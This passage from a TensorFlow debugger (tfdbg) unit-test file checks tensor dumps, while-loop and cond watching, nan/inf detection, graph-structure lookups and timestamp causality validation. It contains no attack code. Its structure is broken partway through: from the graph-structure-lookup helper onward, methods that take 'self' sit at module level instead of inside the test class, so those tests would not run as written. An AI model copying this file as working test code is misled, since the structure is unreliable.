        results.dump.get_rel_timestamps("%s/read" % results.v_name, 0,
                                        "DebugIdentity")[0], 0)
    self.assertGreater(
        results.dump.get_dump_sizes_bytes("%s/read" % results.u_name, 0,
                                          "DebugIdentity")[0], 0)
    self.assertGreater(
        results.dump.get_dump_sizes_bytes("%s/read" % results.v_name, 0,
                                          "DebugIdentity")[0], 0)
  def testGetOpTypeWorks(self):
    """node_op_type() reports op types and raises for unknown node names."""
    results = self._generate_dump_from_simple_addition_graph()
    self.assertEqual(results.u.op.type,
                     results.dump.node_op_type(results.u_name))
    self.assertIn(results.v.op.type, results.dump.node_op_type(results.v_name))
    self.assertIn(results.w.op.type, results.dump.node_op_type(results.w_name))
    with self.assertRaisesRegexp(
        ValueError, r"None of the .* device\(s\) has a node named "):
      results.dump.node_op_type("foo_bar")
  def testDumpStringTensorsWorks(self):
    """String (DT_STRING) tensors can be dumped and read back from disk."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      str1_init_val = np.array(b"abc")
      str2_init_val = np.array(b"def")
      str1_init = constant_op.constant(str1_init_val)
      str2_init = constant_op.constant(str2_init_val)
      str1_name = "str1"
      str2_name = "str2"
      str1 = variables.Variable(str1_init, name=str1_name)
      str2 = variables.Variable(str2_init, name=str2_name)
      # Concatenate str1 and str2
      str_concat = math_ops.add(str1, str2, name="str_concat")
      str1.initializer.run()
      str2.initializer.run()
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % str1_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for v.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % str2_name, 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      sess.run(str_concat, options=run_options, run_metadata=run_metadata)
      # String ops are located on CPU.
      self.assertEqual(1, len(run_metadata.partition_graphs))
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      self.assertIn(str1_name, dump.nodes())
      self.assertIn(str2_name, dump.nodes())
      self.assertEqual(2, dump.size)
      self.assertEqual([str1_init_val],
                       dump.get_tensors("%s/read" % str1_name, 0,
                                        "DebugIdentity"))
      self.assertEqual([str2_init_val],
                       dump.get_tensors("%s/read" % str2_name, 0,
                                        "DebugIdentity"))
      self.assertGreaterEqual(
          dump.get_rel_timestamps("%s/read" % str1_name, 0, "DebugIdentity")[0],
          0)
      self.assertGreaterEqual(
          dump.get_rel_timestamps("%s/read" % str2_name, 0, "DebugIdentity")[0],
          0)
      self.assertGreater(
          dump.get_dump_sizes_bytes("%s/read" % str1_name, 0,
                                    "DebugIdentity")[0], 0)
      self.assertGreater(
          dump.get_dump_sizes_bytes("%s/read" % str2_name, 0,
                                    "DebugIdentity")[0], 0)
  def testDumpUninitializedVariable(self):
    """Watching a variable during its initializer run captures its
    pre-initialization state as an InconvertibleTensorProto."""
    op_namespace = "testDumpUninitializedVariable"
    with session.Session() as sess:
      u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
      s_init_val = b"str1"
      u_name = "%s/u" % op_namespace
      s_name = "%s/s" % op_namespace
      u_init = constant_op.constant(u_init_val, shape=[2, 2])
      u = variables.Variable(u_init, name=u_name)
      s_init = constant_op.constant(s_init_val)
      s = variables.Variable(s_init, name=s_name)
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, u_name, 0, debug_urls=debug_urls)
      debug_utils.add_debug_tensor_watch(
          run_options, s_name, 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      # Initialize u and s.
      sess.run(variables.global_variables_initializer(),
               options=run_options,
               run_metadata=run_metadata)
      # Verify the dump file for the uninitialized value of u.
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      self.assertEqual(2, dump.size)
      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
      # Verify that the variable is properly initialized by the run() call.
      u_vals = dump.get_tensors(u_name, 0, "DebugIdentity")
      s_vals = dump.get_tensors(s_name, 0, "DebugIdentity")
      self.assertEqual(1, len(u_vals))
      # The watched value was captured before initialization finished, so it
      # is flagged uninitialized instead of being converted to an ndarray.
      self.assertIsInstance(u_vals[0], debug_data.InconvertibleTensorProto)
      self.assertFalse(u_vals[0].initialized)
      self.assertEqual(1, len(s_vals))
      self.assertIsInstance(s_vals[0], debug_data.InconvertibleTensorProto)
      self.assertFalse(s_vals[0].initialized)
      # Call run() again, to check that u is initialized properly.
      self.assertAllClose(u_init_val, sess.run(u))
      self.assertEqual(s_init_val, sess.run(s))
  def testDebugWhileLoopGeneratesMultipleDumps(self):
    """Each while-loop iteration produces its own dump of watched tensors."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      num_iter = 10
      # "u" is the Variable being updated in the loop.
      u_name = "testDumpToFileWhileLoop/u"
      u_namespace = u_name.split("/")[0]
      u_init_val = np.array(11.0)
      u_init = constant_op.constant(u_init_val)
      u = variables.Variable(u_init, name=u_name)
      # "v" is the increment.
      v_name = "testDumpToFileWhileLoop/v"
      v_namespace = v_name.split("/")[0]
      v_init_val = np.array(2.0)
      v_init = constant_op.constant(v_init_val)
      v = variables.Variable(v_init, name=v_name)
      u.initializer.run()
      v.initializer.run()
      i = constant_op.constant(0, name="testDumpToFileWhileLoop/i")
      def cond(i):
        return math_ops.less(i, num_iter)
      def body(i):
        new_u = state_ops.assign_add(u, v)
        new_i = math_ops.add(i, 1)
        # Force u's update to complete before the counter advances.
        op = control_flow_ops.group(new_u)
        new_i = control_flow_ops.with_dependencies([op], new_i)
        return [new_i]
      loop = control_flow_ops.while_loop(
          cond, body, [i], parallel_iterations=10)
      # Create RunOptions for debug-watching tensors
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, u_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for v.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for while/Identity.
      debug_utils.add_debug_tensor_watch(
          run_options, "while/Identity", 0, debug_urls=debug_urls)
      # Add debug tensor watch for while/Add/y.
      debug_utils.add_debug_tensor_watch(
          run_options, "while/Add/y", 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      r = sess.run(loop, options=run_options, run_metadata=run_metadata)
      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
      self.assertEqual(num_iter, r)
      u_val_final = sess.run(u)
      self.assertAllClose(u_init_val + num_iter * v_init_val, u_val_final)
      # Verify dump files
      self.assertTrue(os.path.isdir(self._dump_root))
      u_glob_out = glob.glob(os.path.join(self._dump_root, "*", u_namespace))
      v_glob_out = glob.glob(os.path.join(
          self._dump_root, "*", v_namespace, "v"))
      self.assertTrue(os.path.isdir(u_glob_out[0]))
      self.assertTrue(os.path.isdir(v_glob_out[0]))
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      # Expected dumped tensors: u, v/read, 10 iterations of while/Identity,
      # and 10 iterations of while/Add/y.
      self.assertEqual(1 + 1 + num_iter + num_iter, dump.size)
      # Verify tensor values.
      self.assertAllClose([u_init_val],
                          dump.get_tensors(u_name, 0, "DebugIdentity"))
      self.assertAllClose([v_init_val],
                          dump.get_tensors("%s/read" % v_name, 0,
                                           "DebugIdentity"))
      while_id_tensors = dump.get_tensors("while/Identity", 0, "DebugIdentity")
      self.assertEqual(10, len(while_id_tensors))
      for k in xrange(len(while_id_tensors)):
        self.assertAllClose(np.array(k), while_id_tensors[k])
      # Verify ascending timestamps from the while loops.
      while_id_rel_timestamps = dump.get_rel_timestamps("while/Identity", 0,
                                                        "DebugIdentity")
      while_id_dump_sizes_bytes = dump.get_dump_sizes_bytes("while/Identity", 0,
                                                            "DebugIdentity")
      self.assertEqual(10, len(while_id_rel_timestamps))
      prev_rel_time = 0
      prev_dump_size_bytes = while_id_dump_sizes_bytes[0]
      # The loop counter is the same scalar type every iteration, so every
      # dump should be the same size; timestamps must not move backwards.
      for rel_time, dump_size_bytes in zip(while_id_rel_timestamps,
                                           while_id_dump_sizes_bytes):
        self.assertGreaterEqual(rel_time, prev_rel_time)
        self.assertEqual(dump_size_bytes, prev_dump_size_bytes)
        prev_rel_time = rel_time
        prev_dump_size_bytes = dump_size_bytes
      # Test querying debug watch keys from node name.
      watch_keys = dump.debug_watch_keys("while/Identity")
      self.assertEqual(["while/Identity:0:DebugIdentity"], watch_keys)
      # Test querying debug datum instances from debug watch key.
      self.assertEqual(10, len(dump.watch_key_to_data(watch_keys[0])))
      self.assertEqual([], dump.watch_key_to_data("foo"))
  def testDebugWhileLoopWatchingWholeGraphWorks(self):
    """Whole-graph watching captures every iteration of a while loop."""
    with session.Session() as sess:
      loop_body = lambda i: math_ops.add(i, 2)
      loop_cond = lambda i: math_ops.less(i, 16)
      i = constant_op.constant(10, name="i")
      loop = control_flow_ops.while_loop(loop_cond, loop_body, [i])
      loop_result, dump = self._debug_run_and_get_dump(sess, loop)
      self.assertEqual(16, loop_result)
      # Enter sees only the initial value; NextIteration sees each update.
      self.assertEqual(
          [[10]], dump.get_tensors("while/Enter", 0, "DebugIdentity"))
      self.assertEqual(
          [[12], [14], [16]],
          dump.get_tensors("while/NextIteration", 0, "DebugIdentity"))
  def testDebugTrainingDynamicRNNWorks(self):
    """tfdbg can watch a dynamic_rnn training step (with name blacklists)."""
    with session.Session() as sess:
      input_size = 3
      state_size = 2
      time_steps = 4
      batch_size = 2
      input_values = np.random.randn(time_steps, batch_size, input_size)
      sequence_length = np.random.randint(0, time_steps, size=batch_size)
      concat_inputs = array_ops.placeholder(
          dtypes.float32, shape=(time_steps, batch_size, input_size))
      outputs_dynamic, _ = rnn.dynamic_rnn(
          _RNNCellForTest(input_size, state_size),
          inputs=concat_inputs,
          sequence_length=sequence_length,
          time_major=True,
          dtype=dtypes.float32)
      toy_loss = math_ops.reduce_sum(outputs_dynamic * outputs_dynamic)
      train_op = gradient_descent.GradientDescentOptimizer(
          learning_rate=0.1).minimize(toy_loss, name="train_op")
      sess.run(variables.global_variables_initializer())
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph_with_blacklists(
          run_options,
          sess.graph,
          node_name_regex_blacklist="(.*rnn/while/.*|.*TensorArray.*)",
          debug_urls=self._debug_urls())
      # b/36870549: Nodes with these name patterns need to be excluded from
      # tfdbg in order to prevent MSAN warnings of uninitialized Tensors
      # under both file:// and grpc:// debug URL schemes.
      run_metadata = config_pb2.RunMetadata()
      sess.run(train_op, feed_dict={concat_inputs: input_values},
               options=run_options, run_metadata=run_metadata)
      # Loading the dump directory validates the watched tensors were written.
      debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
  def testDebugCondWatchingWholeGraphWorks(self):
    """Whole-graph watching works across tf.cond branches."""
    with session.Session() as sess:
      x = variables.Variable(10.0, name="x")
      y = variables.Variable(20.0, name="y")
      cond = control_flow_ops.cond(
          x > y, lambda: math_ops.add(x, 1), lambda: math_ops.add(y, 1))
      sess.run(variables.global_variables_initializer())
      cond_result, dump = self._debug_run_and_get_dump(sess, cond)
      self.assertEqual(21, cond_result)
      # x < y, so the false branch (y + 1 = 21) reaches the Merge node.
      self.assertAllClose(
          [21.0], dump.get_tensors("cond/Merge", 0, "DebugIdentity"))
  def testFindNodesWithBadTensorValues(self):
    """dump.find() locates the tensors that contain nan or inf."""
    with session.Session() as sess:
      u_name = "testFindNodesWithBadTensorValues/u"
      v_name = "testFindNodesWithBadTensorValues/v"
      w_name = "testFindNodesWithBadTensorValues/w"
      x_name = "testFindNodesWithBadTensorValues/x"
      y_name = "testFindNodesWithBadTensorValues/y"
      z_name = "testFindNodesWithBadTensorValues/z"
      u_init = constant_op.constant([2.0, 4.0])
      u = variables.Variable(u_init, name=u_name)
      v_init = constant_op.constant([2.0, 1.0])
      v = variables.Variable(v_init, name=v_name)
      # Expected output: [0.0, 3.0]
      w = math_ops.subtract(u, v, name=w_name)
      # Expected output: [inf, 1.3333]
      x = math_ops.div(u, w, name=x_name)
      # Expected output: [nan, 4.0]
      y = math_ops.multiply(w, x, name=y_name)
      z = math_ops.multiply(y, y, name=z_name)
      u.initializer.run()
      v.initializer.run()
      _, dump = self._debug_run_and_get_dump(
          sess, z,
          expected_partition_graph_count=self._expected_partition_graph_count)
      def has_bad_value(_, tensor):
        # Predicate for dump.find(): True if the tensor has any nan/inf.
        return np.any(np.isnan(tensor)) or np.any(np.isinf(tensor))
      # Find all "offending tensors".
      bad_data = dump.find(has_bad_value)
      # Verify that the nodes with bad values are caught through running find
      # on the debug dump.
      self.assertEqual(3, len(bad_data))
      self.assertEqual(x_name, bad_data[0].node_name)
      self.assertEqual(y_name, bad_data[1].node_name)
      self.assertEqual(z_name, bad_data[2].node_name)
      # Test first_n kwarg of find(): Find the first offending tensor.
      first_bad_datum = dump.find(has_bad_value, first_n=1)
      self.assertEqual(1, len(first_bad_datum))
      self.assertEqual(x_name, first_bad_datum[0].node_name)
def _session_run_for_graph_structure_lookup(self):
  """Run a small u -> v -> w graph under the debugger and return its dump.

  Returns:
    Tuple of (u_name, v_name, w_name, dump) shared by the
    graph-structure-lookup tests below.
  """
  with session.Session(config=no_rewrite_session_config()) as sess:
    u_name = "testDumpGraphStructureLookup/u"
    v_name = "testDumpGraphStructureLookup/v"
    w_name = "testDumpGraphStructureLookup/w"

    u_init = constant_op.constant([2.0, 4.0])
    u = variables.Variable(u_init, name=u_name)
    v = math_ops.add(u, u, name=v_name)
    w = math_ops.add(v, v, name=w_name)

    u.initializer.run()

    _, dump = self._debug_run_and_get_dump(
        sess, w,
        expected_partition_graph_count=self._expected_partition_graph_count)

  return u_name, v_name, w_name, dump
def testGraphStructureLookupGivesDevicesAndNodesInfo(self):
  """Device and node-existence queries on the dump reflect the graph."""
  variable_name, _, _, dump = self._session_run_for_graph_structure_lookup()

  # num_devices() reports the expected number of devices.
  device_list = dump.devices()
  self.assertEqual(self._expected_num_devices, len(device_list))

  # node_device() maps the variable node to the main device; an unknown
  # node name raises ValueError.
  self.assertEqual(self._main_device, dump.node_device(variable_name))
  with self.assertRaisesRegexp(ValueError,
                               "does not exist in partition graphs"):
    dump.node_device(variable_name + "foo")

  # node_exists() is true for the variable and its read op, false for a
  # made-up child of the read op.
  read_name = variable_name + "/read"
  self.assertTrue(dump.node_exists(variable_name))
  self.assertTrue(dump.node_exists(read_name))
  self.assertFalse(dump.node_exists(read_name + "/foo"))
def testGraphStructureLookupGivesNodesAndAttributes(self):
  """Node lists and per-node attributes can be queried from the dump."""
  u_name, _, _, dump = self._session_run_for_graph_structure_lookup()

  u_read_name = u_name + "/read"

  # Test node name list lookup of the DebugDumpDir object.
  if test_util.gpu_device_name():
    node_names = dump.nodes(
        device_name="/job:localhost/replica:0/task:0/device:GPU:0")
  else:
    node_names = dump.nodes()
  self.assertTrue(u_name in node_names)
  self.assertTrue(u_read_name in node_names)

  # Test querying node attributes.
  u_attr = dump.node_attributes(u_name)
  self.assertEqual(dtypes.float32, u_attr["dtype"].type)
  # The variable was initialized from a 1-D, 2-element constant.
  self.assertEqual(1, len(u_attr["shape"].shape.dim))
  self.assertEqual(2, u_attr["shape"].shape.dim[0].size)

  # Unknown node names raise ValueError.
  with self.assertRaisesRegexp(
      ValueError, r"None of the .* device\(s\) has a node named "):
    dump.node_attributes("foo")
def testGraphStructureLookupGivesDebugWatchKeys(self):
  """debug_watch_keys() and watch_key_to_data() agree with the watch list."""
  u_name, v_name, w_name, dump = (
      self._session_run_for_graph_structure_lookup())

  # Each watched node carries exactly one DebugIdentity key on slot 0;
  # unknown node names yield an empty list.
  for node_name in (u_name, v_name, w_name):
    self.assertEqual(["%s:0:DebugIdentity" % node_name],
                     dump.debug_watch_keys(node_name))
  self.assertEqual([], dump.debug_watch_keys("foo"))

  # A watch key resolves to a single datum carrying the node name, output
  # slot, debug op and a non-negative timestamp.
  u_data = dump.watch_key_to_data(dump.debug_watch_keys(u_name)[0])
  self.assertEqual(1, len(u_data))
  datum = u_data[0]
  self.assertEqual(u_name, datum.node_name)
  self.assertEqual(0, datum.output_slot)
  self.assertEqual("DebugIdentity", datum.debug_op)
  self.assertGreaterEqual(datum.timestamp, 0)

  # Unknown watch keys resolve to an empty list rather than raising.
  self.assertEqual([], dump.watch_key_to_data("foo"))
def testGraphStructureLookupGivesNodeInputsAndRecipients(self):
  """Input, recipient and transitive-input lookups reflect the graph."""
  u_name, v_name, w_name, dump = (
      self._session_run_for_graph_structure_lookup())

  u_read_name = u_name + "/read"

  # Test the inputs lookup of the DebugDumpDir object.
  # Graph is u -> u/read -> v (twice) -> w (twice); see the helper above.
  self.assertEqual([], dump.node_inputs(u_name))
  self.assertEqual([u_name], dump.node_inputs(u_read_name))
  self.assertEqual([u_read_name] * 2, dump.node_inputs(v_name))
  self.assertEqual([v_name] * 2, dump.node_inputs(w_name))

  # None of the nodes has control inputs.
  self.assertEqual([], dump.node_inputs(u_name, is_control=True))
  self.assertEqual([], dump.node_inputs(u_read_name, is_control=True))
  self.assertEqual([], dump.node_inputs(v_name, is_control=True))
  self.assertEqual([], dump.node_inputs(w_name, is_control=True))

  # Test the outputs recipient lookup of the DebugDumpDir object.
  self.assertTrue(u_read_name in dump.node_recipients(u_name))
  self.assertEqual(2, dump.node_recipients(u_read_name).count(v_name))
  self.assertEqual(2, dump.node_recipients(v_name).count(w_name))

  self.assertEqual([], dump.node_recipients(u_name, is_control=True))
  self.assertEqual([], dump.node_recipients(u_read_name, is_control=True))
  self.assertEqual([], dump.node_recipients(v_name, is_control=True))
  self.assertEqual([], dump.node_recipients(w_name, is_control=True))

  # Test errors raised on invalid node names.
  with self.assertRaisesRegexp(
      ValueError, r"None of the .* device\(s\) has a node named "):
    dump.node_inputs(u_name + "foo")
  with self.assertRaisesRegexp(
      ValueError, r"None of the .* device\(s\) has a node named "):
    dump.node_recipients(u_name + "foo")

  # Test transitive_inputs().
  self.assertEqual([], dump.transitive_inputs(u_name))
  self.assertEqual([u_name], dump.transitive_inputs(u_read_name))
  self.assertEqual(
      set([u_name, u_read_name]), set(dump.transitive_inputs(v_name)))
  self.assertEqual(
      set([u_name, u_read_name, v_name]), set(dump.transitive_inputs(w_name)))

  with self.assertRaisesRegexp(
      ValueError, r"None of the .* device\(s\) has a node named "):
    dump.transitive_inputs(u_name + "foo")
def testGraphStructureLookupWithoutPartitionGraphsDoesNotErrorOut(self):
  """Reloading a dump without explicit partition graphs still succeeds."""
  # Produce a dump directory first; the returned names are not needed here.
  self._session_run_for_graph_structure_lookup()

  # Reload from disk without supplying partition graphs: they should be
  # picked up from the dump directory itself, without raising.
  reloaded = debug_data.DebugDumpDir(self._dump_root, validate=False)
  self.assertTrue(reloaded.loaded_partition_graphs())
def testGraphPathFindingOnControlEdgesWorks(self):
  """find_some_path() traverses control edges unless told not to."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    v1 = variables.Variable(1.0, name="v1")
    v2 = variables.Variable(2.0, name="v2")
    v3 = variables.Variable(3.0, name="v3")
    a = math_ops.add(v1, v2, name="a")
    # c depends on a only through a control edge.
    with ops.control_dependencies([a]):
      c = math_ops.subtract(v3, v3, name="c")
    sess.run(variables.global_variables_initializer())
    _, dump = self._debug_run_and_get_dump(sess, c)

    # The only path from v1 to c goes through the control edge a -> c, so
    # it is found only when control edges are included (the default).
    self.assertEqual(["v1", "v1/read", "a", "c"],
                     dump.find_some_path("v1", "c"))
    self.assertIsNone(dump.find_some_path("v1", "c", include_control=False))
def testGraphPathFindingReverseRefEdgeWorks(self):
  """find_some_path() can traverse a ref edge in reverse when asked to."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    v = variables.Variable(10.0, name="v")
    delta = variables.Variable(1.0, name="delta")
    inc_v = state_ops.assign_add(v, delta, name="inc_v")

    sess.run(variables.global_variables_initializer())
    _, dump = self._debug_run_and_get_dump(sess, inc_v)

    # The path from delta to v exists only via the reversed ref edge
    # through inc_v, so it is found only with include_reversed_ref=True.
    self.assertEqual(
        ["delta", "delta/read", "inc_v", "v"],
        dump.find_some_path("delta", "v", include_reversed_ref=True))
    self.assertIsNone(dump.find_some_path("delta", "v"))
def testCausalityCheckOnDumpsDetectsWrongTemporalOrder(self):
  """Swapping dump-file timestamps triggers the causality validation."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    u_name = "testDumpCausalityCheck/u"
    v_name = "testDumpCausalityCheck/v"
    w_name = "testDumpCausalityCheck/w"

    u_init = constant_op.constant([2.0, 4.0])
    u = variables.Variable(u_init, name=u_name)
    v = math_ops.add(u, u, name=v_name)
    w = math_ops.add(v, v, name=w_name)

    u.initializer.run()

    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=["DebugIdentity"],
        debug_urls=self._debug_urls())

    run_metadata = config_pb2.RunMetadata()
    sess.run(w, options=run_options, run_metadata=run_metadata)

    self.assertEqual(self._expected_partition_graph_count,
                     len(run_metadata.partition_graphs))

    # First, loading the original dump without supplying the
    # partition_graphs should not cause a LookupError, validation occurs
    # only with partition_graphs loaded.
    debug_data.DebugDumpDir(self._dump_root)

    # Now, loading the original dump with partition graphs supplied should
    # succeed. The validation should pass quietly.
    dump = debug_data.DebugDumpDir(
        self._dump_root, partition_graphs=run_metadata.partition_graphs)

    # Get the dump file names and compute their timestamps.
    self.assertEqual(
        1, len(dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")))
    v_file_path = dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")[0]

    self.assertEqual(
        1, len(dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")))
    w_file_path = dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")[0]

    # The timestamp is the integer suffix after the last "_" in the file
    # name.
    v_timestamp = int(v_file_path[v_file_path.rindex("_") + 1:])
    w_timestamp = int(w_file_path[w_file_path.rindex("_") + 1:])

    # Swap and slightly shift the time stamps of the last two dumped tensors,
    # to simulate "causality violation", which can happen if the dump
    # directory contains incomplete data and/or mixes data from different
    # Session.run() calls.
    v_file_path_1 = v_file_path[:v_file_path.rindex(
        "_")] + "_%d" % w_timestamp
    w_file_path_1 = w_file_path[:w_file_path.rindex("_")] + "_%d" % (
        v_timestamp - 1)

    os.rename(v_file_path, v_file_path_1)
    os.rename(w_file_path, w_file_path_1)

    # Load the dump directory again. Now a ValueError is expected to be
    # raised due to the timestamp swap.
    with self.assertRaisesRegexp(ValueError, "Causality violated"):
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)

    # Loading the dump directory with kwarg "validate" set explicitly to
    # False should get rid of the error.
    dump = debug_data.DebugDumpDir(
        self._dump_root,
        partition_graphs=run_metadata.partition_graphs,
        validate=False)

    # Next, set the two times stamps to be the same, which should be fine.
    v_file_path_2 = v_file_path[:v_file_path.rindex(
        "_")] + "_%d" % w_timestamp
    w_file_path_2 = w_file_path[:w_file_path.rindex(
        "_")] + "_%d" % w_timestamp

    os.rename(v_file_path_1, v_file_path_2)
    os.rename(w_file_path_1, w_file_path_2)

    debug_data.DebugDumpDir(
        self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testWatchingOnlyOneOfTwoOutputSlotsDoesNotLeadToCausalityFailure(self):
  """Watching a subset of a node's output slots still passes validation."""
  with session.Session() as sess:
    x_name = "oneOfTwoSlots/x"
    u_name = "oneOfTwoSlots/u"
    v_name = "oneOfTwoSlots/v"
    w_name = "oneOfTwoSlots/w"
    y_name = "oneOfTwoSlots/y"

    x = variables.Variable([1, 3, 3, 7], dtype=dtypes.int32, name=x_name)
    sess.run(x.initializer)

    # unique_with_counts emits multiple output slots from node u.
    unique_x, indices, _ = array_ops.unique_with_counts(x, name=u_name)

    v = math_ops.add(unique_x, unique_x, name=v_name)
    w = math_ops.add(indices, indices, name=w_name)
    y = math_ops.add(w, w, name=y_name)

    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    # Watch only the first output slot of u, even though it has two output
    # slots.
    debug_utils.add_debug_tensor_watch(
        run_options, u_name, 0, debug_urls=self._debug_urls())
    debug_utils.add_debug_tensor_watch(
        run_options, w_name, 0, debug_urls=self._debug_urls())
    debug_utils.add_debug_tensor_watch(
        run_options, y_name, 0, debug_urls=self._debug_urls())

    run_metadata = config_pb2.RunMetadata()
    sess.run([v, y], options=run_options, run_metadata=run_metadata)

    # validate=True: the partial watch must not trip the causality check.
    dump = debug_data.DebugDumpDir(
        self._dump_root,
        partition_graphs=run_metadata.partition_graphs,
        validate=True)

    # Unique values of [1, 3, 3, 7].
    self.assertAllClose([1, 3, 7],
                        dump.get_tensors(u_name, 0, "DebugIdentity")[0])
def testOutputSlotWithoutOutgoingEdgeCanBeWatched(self):
  """Test watching output slots not attached to any outgoing edges."""
  with session.Session(config=no_rewrite_session_config()) as sess:
    u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
    u = constant_op.constant(u_init_val, shape=[2, 2], name="u")

    # Create a control edge from a node with an output: From u to z.
    # Node u will get executed only because of the control edge. The output
    # tensor u:0 is not attached to any outgoing edge in the graph. This test
    # checks that the debugger can watch such a tensor.
    with ops.control_dependencies([u]):
      z = control_flow_ops.no_op(name="z")

    _, dump = self._debug_run_and_get_dump(sess, z)

    # Assert that the DebugIdentity watch on u works properly.
    self.assertEqual(1, len(dump.dumped_tensor_data))
    datum = dump.dumped_tensor_data[0]
    self.assertEqual("u", datum.node_name)
    self.assertEqual(0, datum.output_slot)
    self.assertEqual("DebugIdentity", datum.debug_op)
    self.assertAllClose([[5.0, 3.0], [-1.0, 0.0]], datum.get_tensor())
def testWatchingVariableUpdateOpsSeesUpdatedValues(self):
  """Watch output slots on Variable-updating ops, with no emitted edges."""
  with session.Session() as sess:
    u_init = constant_op.constant(10.0)
    u = variables.Variable(u_init, name="gdo/u")
    v_init = constant_op.constant(20.0)
    v = variables.Variable(v_init, name="gdo/v")

    w = math_ops.multiply(u, v, name="gdo/w")

    # gdo stands for GradientDescentOptimizer.
    train_op = gradient_descent.GradientDescentOptimizer(
        learning_rate=0.1).minimize(
            w, name="gdo/train")

    u.initializer.run()
    v.initializer.run()

    _, dump = self._debug_run_and_get_dump(sess, train_op)

    update_u_data = dump.watch_key_to_data(
        "gdo/train/update_gdo/u/ApplyGradientDescent:0:DebugIdentity")
    self.assertEqual(1, len(update_u_data))

    # Gradient descent on u: w = u * v, so dw / du = v.
    # Updated value of u should be:
    #   10.0 - learning_rate * v = 10.0 - 0.1 * 20.0 = 8.0
    self.assertAllClose(8.0, update_u_data[0].get_tensor())

    update_v_data = dump.watch_key_to_data(
        "gdo/train/update_gdo/v/ApplyGradientDescent:0:DebugIdentity")
    self.assertEqual(1, len(update_v_data))

    # Gradient descent on u: w = u * v, so dw / dv = u.
    # Updated value of u should be:
    #   20.0 - learning_rate * u = 20.0 - 0.1 * 10.0 = 19.0
    self.assertAllClose(19.0, update_v_data[0].get_tensor())

    # Verify that the Variables u and v are updated properly.
    self.assertAllClose(8.0, sess.run(u))
    self.assertAllClose(19.0, sess.run(v))
def testAllowsWatchingUnconnectedOutputTensor(self):
  """Watch an output slot not emitting any edges.

  (Not even control edges from the node.)
  """
  with session.Session() as sess:
    x_init = constant_op.constant([2, 2, 3, 5, 5])
    x = variables.Variable(x_init, name="unconnected/x")

    # The UniqueOp (tf.unique) has two output slots. Use only slot 0 in the
    # graph. Let the debugger watch the unused slot 1.
    unique_x, _ = array_ops.unique(x, name="unconnected/unique_x")
    y = math_ops.add(unique_x, [0, 1, 2], name="unconnected/y")

    x.initializer.run()

    # Verify that only slot 0 of unique_x has recipients, while slot 1 of the
    # same node does not have recipients.
    unique_x_slot_0_recipients = []
    unique_x_slot_1_recipients = []
    for op in sess.graph.get_operations():
      for inp in op.inputs:
        if inp.name == "unconnected/unique_x:0":
          unique_x_slot_0_recipients.append(op.name)
        elif inp.name == "unconnected/unique_x:1":
          unique_x_slot_1_recipients.append(op.name)

    self.assertEqual(["unconnected/y"], unique_x_slot_0_recipients)
    self.assertEqual([], unique_x_slot_1_recipients)

    y_result, dump = self._debug_run_and_get_dump(sess, y)
    # unique([2, 2, 3, 5, 5]) = [2, 3, 5]; + [0, 1, 2] = [2, 4, 7].
    self.assertAllClose([2, 4, 7], y_result)

    # Assert that the connected slot (slot 0) is dumped properly.
    unique_x_slot_0_dumps = dump.watch_key_to_data(
        "unconnected/unique_x:0:DebugIdentity")
    self.assertEqual(1, len(unique_x_slot_0_dumps))
    self.assertEqual("unconnected/unique_x",
                     unique_x_slot_0_dumps[0].node_name)
    self.assertEqual(0, unique_x_slot_0_dumps[0].output_slot)
    self.assertAllClose([2, 3, 5], unique_x_slot_0_dumps[0].get_tensor())

    # Assert that the unconnected slot (slot 1) is dumped properly.
    unique_x_slot_1_dumps = dump.watch_key_to_data(
        "unconnected/unique_x:1:DebugIdentity")
    self.assertEqual(1, len(unique_x_slot_1_dumps))
    self.assertEqual("unconnected/unique_x",
                     unique_x_slot_1_dumps[0].node_name)
    self.assertEqual(1, unique_x_slot_1_dumps[0].output_slot)
    self.assertAllClose([0, 0, 1, 2, 2],
                        unique_x_slot_1_dumps[0].get_tensor())
def testSuccessiveDebuggingRunsIncreasesCounters(self):
  """Test repeated Session.run() calls with debugger increments counters."""
  with session.Session() as sess:
    ph = array_ops.placeholder(dtypes.float32, name="successive/ph")
